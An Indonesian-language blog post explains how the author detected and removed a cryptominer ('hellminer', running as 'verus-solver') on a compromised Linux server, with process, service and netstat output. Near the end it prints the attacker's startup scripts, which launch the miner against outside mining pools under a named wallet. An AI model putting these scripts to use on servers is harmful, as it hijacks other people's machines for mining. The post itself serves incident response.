Bismilaahirrohmaanirrohiim…
jika server anda dipakai orang untuk mining, maka cpu usage akan habis dipakai dia, akibatnya, server jadi sangat lemot.
untuk cek bisa pakai perintah
htop
untuk melihat yang paling banyak makan cpu
ps aux --sort=-%cpu | head -20 root 365968 96.0 0.0 92196 2040 ? Rl Aug29 7966:36 verus-solver --cpu 0 root 365967 95.9 0.0 92196 2056 ? Rl Aug29 7965:16 verus-solver --cpu 3 root 365969 95.9 0.0 92196 2068 ? Rl Aug29 7965:16 verus-solver --cpu 2 root 365970 95.9 0.0 92196 1992 ? Rl Aug29 7965:15 verus-solver --cpu 1 mysql 1093 10.8 5.1 2827872 405732 ? Ssl Aug13 3409:05 /usr/libexec/ mysqld --basedir=/usr root 676 0.9 0.0 0 0 ? S< Aug13 308:15 [loop0] root 934181 0.3 0.0 264564 6088 pts/0 S+ 00:47 0:00 htop root 933514 0.2 0.0 0 0 ? I 00:33 0:02 [kworker/u8:0- events_unbound] root 10 0.1 0.0 0 0 ? S Aug13 50:41 [ksoftirqd/0]
nama nya diketahui “verus-solver” walaupun itu bukan nama servisnya.
Cek servis yang jalan, cari yang mencurigakan, khususnya di startup
systemctl list-unit-files --type=service | grep enabled [root@ns1 ~]# systemctl list-unit-files --type=service | grep enabled auditd.service enabled autovt@.service enabled chronyd.service enabled cloud-config.service enabled cloud-final.service enabled cloud-init-local.service enabled cloud-init.service enabled cpecs.service enabled crond.service enabled dbus-org.fedoraproject.FirewallD1.service enabled dbus-org.freedesktop.nm-dispatcher.service enabled dbus-org.freedesktop.timedate1.service enabled dovecot.service enabled firewalld.service enabled getty@.service enabled hellminer.service enabled import-state.service enabled irqbalance.service enabled kdump.service enabled loadmodules.service enabled lscpd.service enabled lshttpd.service enabled lsws.service enabled mariadb.service enabled mysql.service enabled mysqld.service enabled NetworkManager-dispatcher.service enabled NetworkManager-wait-online.service enabled NetworkManager.service enabled nis-domainname.service enabled opendkim.service enabled openlitespeed.service enabled pdns.service enabled postfix.service enabled pure-ftpd.service enabled qemu-guest-agent.service enabled rc-local.service enabled-runtime redis.service enabled rsyslog.service enabled selinux-autorelabel-mark.service enabled sshd.service enabled sssd.service enabled syslog.service enabled sysstat.service enabled systemd-fsck-root.service enabled-runtime timedatex.service enabled tuned.service enabled disini akan banyak list, nah ketemu namanya: hellminer.service
Cek netstat
netstat -tnp | grep ESTABLISHED tcp 0 0 172.104.164.36:22 113.11.181.209:41833 ESTABLISHED 934383/sshd: root [ tcp 0 0 172.104.164.36:40868 139.99.16.105:5040 ESTABLISHED 766320/hellminer tcp 0 0 172.104.164.36:22 113.11.181.209:40421 ESTABLISHED 934272/sshd: root [ tcp 0 544 172.104.164.36:22 113.11.181.209:38827 ESTABLISHED 934116/sshd: root [ tcp 3 0 172.104.164.36:465 206.168.34.45:33774 ESTABLISHED - tcp 0 0 172.104.164.36:51664 193.219.97.14:443 ESTABLISHED 6494/[kswapd0] tcp 0 51 172.104.164.36:443 98.83.177.42:56678 ESTABLISHED 459613/openlitespee tcp 0 0 172.104.164.36:22 113.11.181.209:28737 ESTABLISHED 933174/sshd: root
Miner biasanya connect ke pool di luar negeri (port 3333, 4444, 5555). Setelah ketemu, jangan cuma kill prosesnya → hapus binary/script + matikan cron/systemd service yang memanggilnya.
Kalau banyak sekali hasil mencurigakan → berarti sistem sudah dikuasai penuh, saran terbaik tetap reinstall OS bersih setelah backup data aman.
Penanganan
cek dulu servisnya
systemctl status hellminer.service
hellminer.service - Hellminer Service
Loaded: loaded (/etc/systemd/system/hellminer.service; enabled; vendor preset: disabled)
Active: active (running) since Sat 2025-08-23 08:29:33 UTC; 1 weeks 4 days ago
Main PID: 766318 (start-hellminer)
Tasks: 12 (limit: 49498)
Memory: 30.9M
CGroup: /system.slice/hellminer.service
├─365967 verus-solver --cpu 3
├─365968 verus-solver --cpu 0
├─365969 verus-solver --cpu 2
├─365970 verus-solver --cpu 1
├─766318 /bin/bash /home/tings/miner/start-hellminer.sh
├─766319 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4
└─766320 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4
Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38728 [10 ms]
Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38729 [11 ms]
Sep 04 01:00:54 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38730 [10 ms]
Sep 04 01:01:10 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38731 [10 ms]
Sep 04 01:01:28 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38732 [2 ms]
Sep 04 01:01:32 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38733 [10 ms]
Sep 04 01:01:34 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38734 [11 ms]
Sep 04 01:01:37 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38735 [11 ms]
Sep 04 01:02:14 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38736 [10 ms]
Sep 04 01:02:17 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38737 [9 ms]
udah ketahuan dia dimana, tinggal eksekusi
systemctl stop hellminer.service
menonaktifkan service autostart / startup
systemctl disable hellminer.service Kalau ingin benar-benar hilang (hapus file servicenya): rm -f /etc/systemd/system/hellminer.service systemctl daemon-reload
Selesai.
Berikut ini contoh isi file startup dari kode minernya
file miner: ada di /root/miner/ start-hellminer.sh #!/bin/bash cd /root/miner export TMPDIR=/root/miner/tmpdir # Jalankan hellminer dengan threads maksimum /root/miner/hellminer -c stratum+tcp://na.luckpool.net:3956 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4 /home/tings/miner/start-hellminer.sh #!/bin/bash cd /home/tings/miner export TMPDIR=/home/tings/miner/tmpdir # Jalankan hellminer dengan threads maksimum /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4
Demikian, semoga bermanfaat
